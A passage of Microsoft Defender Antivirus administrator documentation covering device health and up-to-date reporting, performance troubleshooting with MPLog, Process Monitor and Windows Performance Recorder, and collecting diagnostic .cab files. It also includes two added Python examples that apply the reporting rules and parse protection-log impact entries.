recent antivirus scans. You can return to the report with this information and gather
more details and security recommendations. If any error codes are reported in this
card, there will be a link to learn more about error codes.

For more details on the current Microsoft Defender Antivirus versions and how to
update the different Microsoft Defender Antivirus components, visit Manage Microsoft
Defender Antivirus updates and apply baselines.

Antivirus engine version card


Shows the real-time results of the most current Microsoft Defender Antivirus engine
versions installed across Windows Devices, Mac devices, and Linux devices in your
organization. Microsoft Defender Antivirus engine is updated monthly. For more
information on the current versions and how to update the different Microsoft Defender
Antivirus components, see Microsoft Defender Antivirus platform support.
Antivirus security intelligence version card
Lists the most common Microsoft Defender Antivirus security intelligence versions
installed on devices on your network. Microsoft continually updates Microsoft Defender
security intelligence to address the latest threats, and to refine detection logic. These
refinements to security intelligence enhance Microsoft Defender Antivirus' (and other
Microsoft anti-malware solutions') ability to accurately identify potential threats. This
security intelligence works directly with cloud-based protection to deliver AI-enhanced,
next-generation protection that is fast and powerful.

Antivirus platform version card

Shows the real-time results of the most current Microsoft Defender Antivirus platform
versions installed across versions of Windows, Mac, and Linux devices in your
organization. Microsoft Defender Antivirus platform is updated monthly. For more
information on the current versions and how to update the different Microsoft Defender
Antivirus components, see Microsoft Defender Antivirus platform support.

Up-to-date cards
The up-to-date cards show the up-to-date status for Antivirus engine, Antivirus
platform, and Security intelligence update versions. There are three possible states: Up
to date ('True'), out of date ('False'), and no data available ('Unknown').

) Important

The logic used to make up-to-date determinations has recently been enhanced and
simplified. The new behavior is documented in this section.

Definitions for Up to date, out of date, and no data available are provided for each card
below.

Microsoft Defender Antivirus uses the additional criteria of "Signature refresh time" (the
last time device communicated with up to date reports) to make up-to-date reports and
determinations for engine, platform, and security intelligence updates.

The up-to-date status is automatically marked as "unknown" or "no data available" if the
device hasn't communicated with reports for more than seven days (signature refresh
time >7).

For more information about the aforementioned terms, refer back to the section: New
Microsoft Defender Antivirus filter definitions.

7 Note

Up to date reporting prerequisites

Up to date reporting generates information for devices that meet the following
criteria:

Engine version: 1.1.19300.2+
Platform version: 4.18.2202.1+
Cloud protection enabled
Windows OS*

*Currently up to date reporting is only available for Windows devices. Cross
platform devices such as Mac and Linux are listed under "no data available"
Up-to-date definitions

Following are up-to-date definitions for engine and platform:

The engine/platform on the device is considered: | Situation
up to date | If the device communicated with the Defender report event ('Signature refresh time') within the last seven days, and the Engine or Platform build version is greater than or equal to (>=) the most recent monthly release version.
out-of-date | If the device communicated with the Defender report event ('Signature refresh time') within the last seven days, but the Engine or Platform build version is less than (<) the most recent monthly release version.
unknown (no data available) | If the device hasn't communicated with the report event ('Signature refresh time') for more than seven days.

Following are the definitions for up-to-date security intelligence:

The security intelligence update is considered: | Situation
up to date | If the security intelligence version on the device was written in the past seven days and the device has communicated with the report event in the past seven days.

For more information, see:

Antivirus engine updates card
Security intelligence updates card
Antivirus platform updates card

Antivirus engine updates card

This card identifies devices that have antivirus engine versions that are up to date versus
out of date.

The general definition of 'up to date' is that the engine version on the device is the most
recent engine release. The engine is typically released monthly, via Windows Update
(WU). There's a three-day grace period given from the day when Windows Update (WU)
is released.

The following table lays out the possible values for up to date reports for Antivirus
Engine. Reported Status is based on the last time reporting event was received
(signature refresh time). If the device hasn't communicated with reports for more than
seven days (signature refresh time >7 days), then the status is automatically marked as
'Unknown' / 'No Data Available'.

Event's Last Refresh Time (also known as "Signature Refresh Time" in reports) and the
resulting Reported Status:

< 7 days (new): whatever the client reports (Up to date, Out of date, or Unknown)
> 7 days (old): Unknown

For information about managing Microsoft Defender Antivirus update versions, see
Monthly platform and engine versions.

Antivirus platform updates card

This card identifies devices that have Antivirus platform versions that are up to date
versus out of date.

The general definition of 'up to date' is that the platform version on the device is the
most recent platform release. Platform is typically released monthly, via Windows
Update (WU). There's a three-day grace period from the day when WU is released.

The following table lays out the possible up to date report values for Antivirus Platform.
Reported values are based on the last time reporting event was received (signature
refresh time). If the device hasn't communicated with reports for more than seven days
(signature refresh time >7 days) then the status is automatically marked as 'Unknown'/
'No Data Available'.

Event's Last Refresh Time (also known as "Signature Refresh Time" in reports) and the
resulting Reported Status:

< 7 days (new): whatever the client reports (Up to date, Out of date, or Unknown)
> 7 days (old): Unknown

For information about managing Microsoft Defender Antivirus update versions, see
Monthly platform and engine versions.

Security intelligence updates card

This card identifies devices that have security intelligence versions that are up to date
versus out of date.

The general definition of 'up to date' is that the security intelligence version on the
device was written in the past 7 days.

The following table lays out the possible up to date report values for Security
Intelligence updates. Reported values are based on the last time reporting event was
received, and the security intelligence publish time. If the device hasn't communicated
with reports for more than seven days (signature refresh time >7 days), then the status
is automatically marked as 'Unknown/ No Data Available'. Otherwise, the determination
is made based on whether the security intelligence publish time is within seven days.

Event's Last Refresh Time (also known as "Signature Refresh Time" in reports),
Security Intelligence Publish Time, and the resulting Reported Status:

>7 days (old), >7 days (old): Unknown
<7 days (new), >7 days (old): Out of date
>7 days (old), <7 days (new): Unknown
<7 days (new), <7 days (new): Up to date
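The determinations in the definitions above and in the three card tables, worked through as an added Python example that is not Microsoft's reporting code: it applies the seven-day signature refresh window, the reporting prerequisites, the monthly-release version comparison, and the security intelligence publish-time rule to constructed device records. The release numbers and dates are made up, and reading the three-day grace period as "the previous release still counts while the grace period runs" is an assumption, since the text only says the grace period exists.

```python
"""Worked example of the up-to-date determinations in the tables above, applied to
constructed device records. Added for illustration; this is not Microsoft's
reporting code, and every version number and date below is made up."""
from dataclasses import dataclass
from datetime import datetime, timedelta

REPORT_WINDOW = timedelta(days=7)   # signature refresh time > 7 days => Unknown
GRACE_PERIOD = timedelta(days=3)    # three-day grace period after a monthly release

# Up to date reporting prerequisites from the note above.
MIN_ENGINE = "1.1.19300.2"
MIN_PLATFORM = "4.18.2202.1"


def parse_version(version: str) -> tuple:
    """'1.1.19300.2' -> (1, 1, 19300, 2): builds must compare numerically, not as
    strings ('4.18.2202.1' < '4.18.24010.1' must hold)."""
    return tuple(int(part) for part in version.split("."))


@dataclass
class DeviceReport:
    os: str                           # "Windows", "macOS", "Linux", ...
    cloud_protection: bool
    signature_refresh_time: datetime  # last time the device sent a report event
    engine_version: str
    platform_version: str
    si_publish_time: datetime         # when the device's security intelligence was written


@dataclass
class MonthlyRelease:
    """Most recent monthly engine/platform release (constructed sample values)."""
    engine_version: str
    platform_version: str
    released_on: datetime
    previous_engine_version: str      # the release before this one
    previous_platform_version: str


def meets_prerequisites(device: DeviceReport) -> bool:
    """Devices outside the prerequisites are listed under 'no data available'."""
    return (
        device.os == "Windows"
        and device.cloud_protection
        and parse_version(device.engine_version) >= parse_version(MIN_ENGINE)
        and parse_version(device.platform_version) >= parse_version(MIN_PLATFORM)
    )


def build_status(device_version: str, current: str, previous: str,
                 release: MonthlyRelease, now: datetime) -> str:
    """Engine/platform rule: build >= most recent monthly release => Up to date.
    Assumption (the text only says a three-day grace period exists): while the
    grace period runs, the previous release still counts as the current one."""
    required = previous if now - release.released_on < GRACE_PERIOD else current
    return "Up to date" if parse_version(device_version) >= parse_version(required) else "Out of date"


def report_statuses(device: DeviceReport, release: MonthlyRelease, now: datetime) -> dict:
    """Return the status each of the three cards would show for this device."""
    if not meets_prerequisites(device) or now - device.signature_refresh_time > REPORT_WINDOW:
        # No report event within seven days, or not eligible: every card shows Unknown.
        return {"engine": "Unknown", "platform": "Unknown", "security_intelligence": "Unknown"}
    # Security intelligence rule: written in the past seven days => Up to date.
    si_status = "Up to date" if now - device.si_publish_time <= REPORT_WINDOW else "Out of date"
    return {
        "engine": build_status(device.engine_version, release.engine_version,
                               release.previous_engine_version, release, now),
        "platform": build_status(device.platform_version, release.platform_version,
                                 release.previous_platform_version, release, now),
        "security_intelligence": si_status,
    }


# Constructed sample: a monthly release on 9 Jan 2024, evaluated on 19 Jan 2024.
RELEASE = MonthlyRelease("1.1.24010.1", "4.18.24010.1", datetime(2024, 1, 9),
                         "1.1.23120.1", "4.18.23120.1")
NOW = datetime(2024, 1, 19)
CURRENT_ENGINE_OLD_PLATFORM = DeviceReport("Windows", True, NOW - timedelta(days=1),
                                           "1.1.24010.1", "4.18.23120.1", NOW - timedelta(days=2))
SILENT_DEVICE = DeviceReport("Windows", True, NOW - timedelta(days=8),
                             "1.1.24010.1", "4.18.24010.1", NOW - timedelta(days=1))
MAC_DEVICE = DeviceReport("macOS", True, NOW, "1.1.24010.1", "4.18.24010.1", NOW)
STALE_SI = DeviceReport("Windows", True, NOW, "1.1.24010.1", "4.18.24010.1", NOW - timedelta(days=9))
# One day after the release: inside the grace period, still on the previous builds.
EARLY = datetime(2024, 1, 10)
GRACE_DEVICE = DeviceReport("Windows", True, EARLY, "1.1.23120.1", "4.18.23120.1", EARLY)

if __name__ == "__main__":
    for label, dev, when in [("current engine, old platform", CURRENT_ENGINE_OLD_PLATFORM, NOW),
                             ("no report for 8 days", SILENT_DEVICE, NOW),
                             ("macOS device", MAC_DEVICE, NOW),
                             ("stale security intelligence", STALE_SI, NOW),
                             ("inside grace period", GRACE_DEVICE, EARLY)]:
        print(f"{label}: {report_statuses(dev, RELEASE, when)}")
```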

See also

Export device antivirus health details API methods and properties
Export device antivirus health report
Threat protection report

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft
Defender Antivirus, like other antivirus software, can cause performance issues on
endpoint devices. In some cases, you might need to tune the performance of
Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's
Performance analyzer is a PowerShell command-line tool that helps determine
which files, file paths, processes, and file extensions might be causing performance
issues; some examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations, for example:
  top files per extension
  top paths per extension
  top processes per path
  top scans per file
  top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.

Tip

For antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Device health, Sensor health & OS report
Article • 11/15/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The Device Health report provides information about the devices in your organization.
The report includes trending information showing the sensor health state, antivirus
status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update
versions.

Important

For Windows Server 2012 R2 and Windows Server 2016 to appear in device health
reports, these devices must be onboarded using the modern unified solution
package. For more information, see New functionality in the modern unified
solution for Windows Server 2012 R2 and 2016.

In the Microsoft 365 Security dashboard navigation panel, select Reports, and then
open Device health and compliance.

The Sensor health & OS tab provides general operating system information,
divided into three cards that display the following device attributes:

Sensor health card
Operating systems and platforms card
Windows versions card

Report access permissions

To access the Device health and antivirus compliance report in the Microsoft 365
Security dashboard, the following permissions are required:

Permission name: View Data
Permission type: Threat and vulnerability management (TVM)

To assign these permissions:

1. Sign in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).
3. Select the role you'd like to edit.
4. Select Edit.
5. In Edit role, on the General tab, in Role name, type a name for the role.
6. In Description, type a brief summary of the role.
7. In Permissions, select View Data, and under View Data select Threat and
vulnerability management (TVM).

For more information about user role management, see Create and manage roles for
role-based access control.

Sensor health & OS tab

Sensor health and OS cards report on general operating system health, which includes
detection sensor health, up to date versus out-of-date operating systems, and Windows
10 versions.

Each of the three cards on the Sensor health tab has two reporting sections, Current
state and device trends, presented as graphs:

Current state graph

In each card, the Current state (referred to in some documentation as Device summary)
is the top, horizontal bar graph. Current state is a snapshot that shows information
collected about devices in your organization, scoped to the current day. This graph
represents the distribution of devices across your organization that report status or are
detected to be in a specific state.

Device trends graph

The lower graph on each of the three cards isn't named, but is commonly known as
device trends. The device trends graph depicts the collection of devices across your
organization, throughout the time span indicated directly above the graph. By default,
the device trends graph displays device information from the 30-day period, ending in
the latest full day. To gain a better perspective about trends occurring in your
organization, you can fine-tune the reporting period by adjusting the time period
shown. To adjust the time period, open the filter and select a start day and end day.

Filtering data

Use the provided filters to include or exclude devices with certain attributes. You can
select multiple filters to apply from the device attributes. When applied, filters apply to
all three cards in the report.

For example, to show data about Windows 10 devices with Active sensor health state:

1. Under Filters > Sensor health state, select Active.
2. Then select OS platforms > Windows 10.
3. Select Apply.

Sensor health card

The Sensor health card displays information about the sensor state on devices. Sensor
health provides an aggregate view of devices that are:

active
inactive
experiencing impaired communications
or where no sensor data is reported

Devices that are either experiencing impaired communications, or devices from which
no sensor data is detected could expose your organization to risks, and warrant
investigation. Likewise, devices that are inactive for extended periods of time could
expose your organization to threats due to out-of-date software. Devices that are
inactive for long periods of time also warrant investigation.

Note

In a small percentage of cases, the numbers and distributions reported when
clicking on the horizontal Sensor health bar graph will be out of sync with the
values shown in the Device inventory page. The disparity in values can occur
because the Sensor health report has a different refresh cadence than the Device
inventory page.

Operating systems and platforms card

This card shows the distribution of operating systems and platforms that exist within
your organization. OS systems and platforms can give useful insights into whether
devices in your organization are running current or outdated operating systems. When
new operating systems are introduced, security enhancements are frequently included
that improve your organization's posture against security threats.

For example, Secure Boot (introduced in Windows 8) practically eliminated the threat
from some of the most harmful types of malware. Improvements in Windows 10 provide
PC manufacturers the option to prevent users from disabling Secure Boot. Preventing
users from disabling Secure Boot removes almost any chance of malicious rootkits or
other low-level malware from infecting the boot process.

Ideally, the "Current state" graph shows that the number of operating systems is
weighted in favor of more current OS versions over older ones. If not, the trends graph
should indicate that new systems are being adopted and/or older systems are being
updated or replaced.

Windows versions card

The Windows 10 versions card shows the distribution of Windows devices and their
versions in your organization. In the same way that an upgrade from Windows 8 to
Windows 10 improves security in your organization, changing from early releases of
Windows to more current versions improves your posture against possible threats.

The Windows version trend graph can help you quickly determine whether your
organization is keeping current by updating to the most recent, most secure versions of
Windows 10.

See also


Microsoft Defender Antivirus health



Troubleshoot performance issues related to real-time protection
Article • 01/04/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

If your system is having high CPU usage or performance issues related to the real-time
protection service in Microsoft Defender for Endpoint, you can submit a ticket to
Microsoft support. Follow the steps in Collect Microsoft Defender Antivirus diagnostic
data.

As an admin, you can also troubleshoot these issues on your own.

First, you might want to check if the issue is being caused by other software. Read
Check with vendor for antivirus exclusions.

Otherwise, you can identify which software is related to the identified performance issue
by following the steps in Analyze the Microsoft Protection Log.

You can also provide additional logs to your submission to Microsoft support by
following the steps in:

Capture process logs using Process Monitor
Capture performance logs using Windows Performance Recorder

For performance-specific issues related to Microsoft Defender Antivirus, see:
Performance analyzer for Microsoft Defender Antivirus

Check with vendor for antivirus exclusions

If you can readily identify the software affecting system performance, go to the software
vendor's knowledge base or support center and check whether they have published
recommendations about antivirus exclusions. If the vendor's website does not have them,
you can open a support ticket with them and ask them to publish one.

We recommend that software vendors follow the various guidelines in Partnering with
the industry to minimize false positives. The vendor can submit their software through
the Microsoft Security Intelligence portal.

Analyze the Microsoft Protection Log

You can find the Microsoft protection log file in C:\ProgramData\Microsoft\Windows
Defender\Support.

In MPLog-xxxxxxxx-xxxxxx.log, you can find the estimated performance impact
information of running software as EstimatedImpact:

Per-process counts:ProcessImageName: smsswd.exe, TotalTime: 6597, Count: 1406, MaxTime: 609, MaxTimeFile: \Device\HarddiskVolume3\_SMSTaskSequence\Packages\WQ1008E9\Files\FramePkg.exe, EstimatedImpact: 65%

Field name and description:

ProcessImageName: Process image name
TotalTime: The cumulative duration in milliseconds spent in scans of files accessed by
this process
Count: The number of scanned files accessed by this process
MaxTime: The duration in milliseconds of the longest single scan of a file accessed by
this process
MaxTimeFile: The path of the file accessed by this process for which the longest scan
(of MaxTime duration) was recorded
EstimatedImpact: The percentage of time spent in scans for files accessed by this
process out of the period in which this process experienced scan activity

If the performance impact is high, try adding the process to the Path/Process exclusions
by following the steps in Configure and validate exclusions for Microsoft Defender
Antivirus scans.
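As an added example that is not code from this article or from Microsoft, the following Python script parses the Per-process counts entries described above and ranks the processes by EstimatedImpact, which is the step that precedes deciding on a Path/Process exclusion. The log lines it uses are constructed, apart from the smsswd.exe entry shown above; the UTF-8 file encoding in the usage block is an assumption.

```python
"""Added example (not Microsoft's code): parse MPLog "Per-process counts" entries
and rank the processes by EstimatedImpact, as a first step before deciding on
path/process exclusions. The sample log lines below are constructed; only the
smsswd.exe entry is the one shown in the article."""
import re
import sys
from dataclasses import dataclass

FIELD_RE = re.compile(
    r"ProcessImageName:\s*(?P<name>[^,]+),\s*"
    r"TotalTime:\s*(?P<total>\d+),\s*"
    r"Count:\s*(?P<count>\d+),\s*"
    r"MaxTime:\s*(?P<max>\d+),\s*"
    r"MaxTimeFile:\s*(?P<file>.+?),\s*"
    r"EstimatedImpact:\s*(?P<impact>\d+)%"
)


@dataclass
class ProcessScanStats:
    process: str       # ProcessImageName
    total_ms: int      # TotalTime: cumulative scan time for files this process touched
    count: int         # Count: number of scanned files accessed by the process
    max_ms: int        # MaxTime: longest single scan
    max_file: str      # MaxTimeFile: the file that took MaxTime
    impact_pct: int    # EstimatedImpact: share of the process's active period spent in scans

    @property
    def avg_ms(self) -> float:
        """Average scan time per file: a high value points at a few expensive files,
        a low value with a large count points at sheer volume."""
        return self.total_ms / self.count if self.count else 0.0


def parse_mplog(lines):
    """Return one ProcessScanStats per line carrying the Per-process counts fields;
    lines without those fields (other MPLog records) are skipped."""
    stats = []
    for line in lines:
        match = FIELD_RE.search(line)
        if match is None:
            continue
        stats.append(ProcessScanStats(
            process=match["name"].strip(),
            total_ms=int(match["total"]),
            count=int(match["count"]),
            max_ms=int(match["max"]),
            max_file=match["file"].strip(),
            impact_pct=int(match["impact"]),
        ))
    return stats


def high_impact(stats, threshold_pct=50):
    """Processes at or above the threshold, highest EstimatedImpact first:
    these are the candidates to review for an exclusion."""
    return sorted((s for s in stats if s.impact_pct >= threshold_pct),
                  key=lambda s: s.impact_pct, reverse=True)


# Constructed sample lines in the format shown in the article.
SAMPLE_MPLOG_LINES = [
    r"Per-process counts:ProcessImageName: smsswd.exe, TotalTime: 6597, Count: 1406, "
    r"MaxTime: 609, MaxTimeFile: \Device\HarddiskVolume3\_SMSTaskSequence\Packages"
    r"\WQ1008E9\Files\FramePkg.exe, EstimatedImpact: 65%",
    r"Per-process counts:ProcessImageName: backupagent.exe, TotalTime: 120500, "
    r"Count: 30125, MaxTime: 2100, MaxTimeFile: \Device\HarddiskVolume3\Backups"
    r"\job-0042\chunk.dat, EstimatedImpact: 82%",
    r"Per-process counts:ProcessImageName: notepad.exe, TotalTime: 42, Count: 3, "
    r"MaxTime: 30, MaxTimeFile: \Device\HarddiskVolume3\Users\alice\notes.txt, "
    r"EstimatedImpact: 2%",
    "BEGIN Per-process counts",   # a record without the fields: must be skipped
]

if __name__ == "__main__":
    # Usage: python mplog_impact.py <path to MPLog-xxxxxxxx-xxxxxx.log>; with no
    # argument the constructed sample is used. UTF-8 file encoding is an assumption.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_MPLOG_LINES
    for s in high_impact(parse_mplog(lines)):
        print(f"{s.process:20} impact={s.impact_pct:3d}%  files={s.count:6d}  "
              f"avg={s.avg_ms:7.2f} ms  max={s.max_ms} ms ({s.max_file})")
```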

If the previous step doesn't solve the problem, you can collect more information
through the Process Monitor or the Windows Performance Recorder in the following
sections.

Capture process logs using Process Monitor

Process Monitor (ProcMon) is an advanced monitoring tool that can show real-time
processes. You can use this to capture the performance issue as it is occurring.

1. Download Process Monitor v3.89 to a folder like C:\temp.

2. To remove the file's mark of the web:

a. Right-click ProcessMonitor.zip and select Properties.
b. Under the General tab, look for Security.
c. Check the box beside Unblock.
d. Select Apply.

3. Unzip the file in C:\temp so that the folder path will be C:\temp\ProcessMonitor.

4. Copy ProcMon.exe to the Windows client or Windows server you're
troubleshooting.

5. Before running ProcMon, make sure all other applications not related to the high
CPU usage issue are closed. Doing this will minimize the number of processes to
check.

6. You can launch ProcMon in two ways.

a. Right-click ProcMon.exe and select Run as administrator.

Since logging starts automatically, select the magnifying glass icon to stop the
current capture or use the keyboard shortcut Ctrl+E.

To verify that you have stopped the capture, check if the magnifying glass icon
now appears with a red X.

Next, to clear the earlier capture, select the eraser icon, or use the keyboard
shortcut Ctrl+X.

b. The second way is to run the command line as admin, then from the Process
Monitor path, run:

Console
Procmon.exe /AcceptEula /Noconnect /Profiling

Tip

Make the ProcMon window as small as possible when capturing data so
you can easily start and stop the trace.

7. After following one of the procedures in step 6, you'll next see an option to set
filters. Select OK. You can always filter the results after the capture is completed.

8. To start the capture, select the magnifying glass icon again.

9. Reproduce the problem.

Tip

Wait for the problem to be fully reproduced, then take note of the timestamp
when the trace started.

10. Once you have two to four minutes of process activity during the high CPU usage
condition, stop the capture by selecting the magnifying glass icon.

11. To save the capture with a unique name and with the .pml format, select File then
select Save.... Make sure to select the radio buttons All events and Native Process
Monitor Format (PML).

12. For better tracking, change the default path from
C:\temp\ProcessMonitor\LogFile.PML to
C:\temp\ProcessMonitor\%ComputerName%_LogFile_MMDDYEAR_Repro_of_issue.PML

where:

%ComputerName% is the device name
MMDDYEAR is the month, day, and year
Repro_of_issue is the name of the issue you're trying to reproduce

Tip

If you have a working system, you might want to get a sample log to
compare.

13. Zip the .pml file and submit it to Microsoft support.

Capture performance logs using Windows Performance Recorder

You can use Windows Performance Recorder (WPR) to include additional information in
your submission to Microsoft support. WPR is a powerful recording tool that creates
Event Tracing for Windows recordings.

WPR is part of the Windows Assessment and Deployment Kit (Windows ADK) and can
be downloaded from Download and install the Windows ADK. You can also download it
as part of the Windows 10 Software Development Kit at Windows 10 SDK.

You can use the WPR user interface by following the steps in Capture performance logs
using the WPR UI.

Alternatively, you can also use the command-line tool wpr.exe, which is available in
Windows 8 and later versions by following the steps in Capture performance logs using
the WPR CLI.

Capture performance logs using the WPR UI

Tip

If multiple devices are experiencing this issue, use the one which has the most
RAM.

1. Download and install WPR.

2. Under Windows Kits, right-click Windows Performance Recorder. Select More.
Select Run as administrator.

3. When the User Account Control dialog box appears, select Yes.

4. Next, download the Microsoft Defender for Endpoint analysis profile and save it as
MDAV.wprp to a folder like C:\temp.

5. On the WPR dialog box, select More options.

6. Select Add Profiles... and browse to the path of the MDAV.wprp file.

7. After that, you should see a new profile set under Custom measurements named
Microsoft Defender for Endpoint analysis underneath it.

Warning

If your Windows Server has 64 GB of RAM or more, use the custom
measurement Microsoft Defender for Endpoint analysis for large servers
instead of Microsoft Defender for Endpoint analysis. Otherwise, your system
could consume a high amount of non-paged pool memory or buffers, which
can lead to system instability. You can choose which profiles to add by
expanding Resource Analysis. This custom profile provides the necessary
context for in-depth performance analysis.

8. To use the custom measurement Microsoft Defender for Endpoint verbose analysis
profile in the WPR UI:
a. Ensure no profiles are selected under the First-level triage, Resource Analysis and
Scenario Analysis groups.
b. Select Custom measurements.
c. Select Microsoft Defender for Endpoint analysis.
d. Select Verbose under Detail level.
e. Select File or Memory under Logging mode.

Important

You should select File to use the file logging mode if the performance issue
can be reproduced directly by the user. Most issues fall under this category.
However, if the user cannot directly reproduce the issue but can easily notice
it once the issue occurs, the user should select Memory to use the memory
logging mode. This ensures that the trace log will not inflate excessively due
to the long run time.

9. Now you're ready to collect data. Exit all the applications that are not relevant to
reproducing the performance issue. You can select Hide options to keep the space
occupied by the WPR window small.

Tip

Try starting the trace at whole number seconds. For instance, 01:30:00. This
will make it easier to analyze the data. Also try to keep track of the timestamp
of exactly when the issue is reproduced.

10. Select Start.

11. Reproduce the issue.

Tip

Keep the data collection to no more than five minutes. Two to three minutes
is a good range since a lot of data is being collected.

12. Select Save.

13. Fill in Type in a detailed description of the problem: with information about the
problem and how you reproduced the issue.

a. Select File Name: to determine where your trace file will be saved. By default, it
is saved to %user%\Documents\WPR Files\.
b. Select Save.

14. Wait while the trace is being merged.

15. Once the trace is saved, select Open folder. Include both the file and the folder
in your submission to Microsoft Support.

Capture performance logs using the WPR CLI

The command-line tool wpr.exe is part of the operating system starting with Windows 8.
To collect a WPR trace using the command-line tool wpr.exe:

1. Download the Microsoft Defender for Endpoint analysis profile for performance
traces to a file named MDAV.wprp in a local directory such as C:\traces.

2. Right-click the Start Menu icon and select Windows PowerShell (Admin) or
Command Prompt (Admin) to open an Admin command prompt window.

3. When the User Account Control dialog box appears, select Yes.

4. At the elevated prompt, run the following command to start a Microsoft Defender
for Endpoint performance trace:

Console
wpr.exe -start C:\traces\MDAV.wprp!WD.Verbose -filemode

Warning

If your Windows Server has 64 GB of RAM or more, use profiles
WDForLargeServers.Light and WDForLargeServers.Verbose instead of profiles
WD.Light and WD.Verbose, respectively. Otherwise, your system could
consume a high amount of non-paged pool memory or buffers, which can
lead to system instability.

5. Reproduce the issue.

Tip

Keep the data collection to no more than five minutes. Depending on the
scenario, two to three minutes is a good range since a lot of data is being
collected.

6. At the elevated prompt, run the following command to stop the performance
trace, making sure to provide information about the problem and how you
reproduced the issue:

Console
wpr.exe -stop merged.etl "Timestamp when the issue was reproduced, in HH:MM:SS format" "Description of the issue" "Any error that popped up"

7. Wait until the trace is merged.

8. Include both the file and the folder in your submission to Microsoft support.



See also
Collect Microsoft Defender Antivirus diagnostic data
Configure and validate exclusions for Microsoft Defender Antivirus scans
Performance analyzer for Microsoft Defender Antivirus



Troubleshoot Microsoft Defender Antivirus reporting in Update Compliance
Article • 02/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Important

On March 31, 2020, the Microsoft Defender Antivirus reporting feature of Update
Compliance will be removed. You can continue to define and review security
compliance policies using the Microsoft Intune family of products, which allows
finer control over security features and updates.

You can use Microsoft Defender Antivirus with Update Compliance. You'll see status for
E3, B, F1, VL, and Pro licenses. However, for E5 licenses, you need to use the Microsoft
Defender for Endpoint portal. To learn more about licensing options, see Windows 10
product licensing options.

When you use Windows Analytics Update Compliance to obtain reporting into the
protection status of devices or endpoints in your network that are using Microsoft
Defender Antivirus, you might encounter problems or issues.

Typically, the most common indicators of a problem are:

You only see a small number or subset of all the devices you were expecting to see
You do not see any devices at all
The reports and information you do see are outdated (older than a few days)

For common error codes and event IDs related to the Microsoft Defender Antivirus
service that are not related to Update Compliance, see Microsoft Defender Antivirus
events.

There are three steps to troubleshooting these problems:

1. Confirm that you have met all prerequisites
2. Check your connectivity to the Windows Defender cloud-based service
3. Submit support logs

Important

It typically takes 3 days for devices to start appearing in Update Compliance.

Confirm prerequisites

In order for devices to properly show up in Update Compliance, you have to meet
certain prerequisites for both the Update Compliance service and for Microsoft
Defender Antivirus:

- Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection
  app. Using any other antivirus app will cause Microsoft Defender Antivirus to
  disable itself and the endpoint will not be reported in Update Compliance.
- Cloud-delivered protection is enabled.
- Endpoints can connect to the Microsoft Defender Antivirus cloud.
- If the endpoint is running Windows 10 version 1607 or earlier, Windows 10
  diagnostic data must be set to the Enhanced level.
- It has been 3 days since all requirements have been met.

If the above prerequisites have all been met, you might need to proceed to the next
step to collect diagnostic information and send it to us.

Collect diagnostic data for Update Compliance troubleshooting



Related topics
Microsoft Defender Antivirus in Windows 10
Deploy Microsoft Defender Antivirus


Collect Microsoft Defender Antivirus diagnostic data
Article • 02/02/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This article describes how to collect diagnostic data that's used by Microsoft support
and engineering teams when they help troubleshoot issues with Microsoft Defender
Antivirus.

Note

As part of the investigation or response process, you can collect an investigation
package from a device. Here's how: Collect investigation package from devices.

For performance-specific issues related to Microsoft Defender Antivirus, see:
Performance analyzer for Microsoft Defender Antivirus.

Get the diagnostic files

On at least two devices that are experiencing the same issue, obtain the .cab diagnostic file by taking the following steps:

1. Open Command Prompt as an administrator by following these steps:

a. Open the Start menu.

b. Type cmd. Right-click on Command Prompt and then select Run as administrator.

c. Specify administrator credentials or approve the prompt.

2. Navigate to the directory for Microsoft Defender Antivirus. By default, it's C:\Program Files\Windows Defender .

7 Note
If you're running an updated Microsoft Defender antimalware platform version, run MpCmdRun from the following location: C:\ProgramData\Microsoft\Windows Defender\Platform\<version> .

3. Type the following command, and then press Enter

Dos

mpcmdrun.exe -GetFiles

4. A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output in the command prompt. By default, the location is
C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab .

7 Note

To redirect the cab file to a different path or UNC share, use the following
command:

mpcmdrun.exe -GetFiles -SupportLogLocation <path>

For more information, see Redirect diagnostic data to a UNC share.

5. Copy these .cab files to a location that can be accessed by Microsoft support. An
example could be a password-protected OneDrive folder that you can share with
us.

7 Note

If you have a problem with Update compliance, send an email using the Update Compliance support email template, and fill out the template with the following information:

I am encountering the following issue when using Microsoft Defender Antivirus in Update Compliance:

I have provided at least 2 support .cab files at the following location:

<accessible share, including access details such as password>

My OMS workspace ID is:

Please contact me at:

Redirect diagnostic data to a UNC share

To collect diagnostic data on a central repository, you can specify the SupportLogLocation parameter.

Dos

mpcmdrun.exe -GetFiles -SupportLogLocation <path>

Copies the diagnostic data to the specified path. If the path isn't specified, the diagnostic data is copied to the location specified in the Support Log Location configuration.

When the SupportLogLocation parameter is used, a folder structure as follows is created in the destination path:

Dos

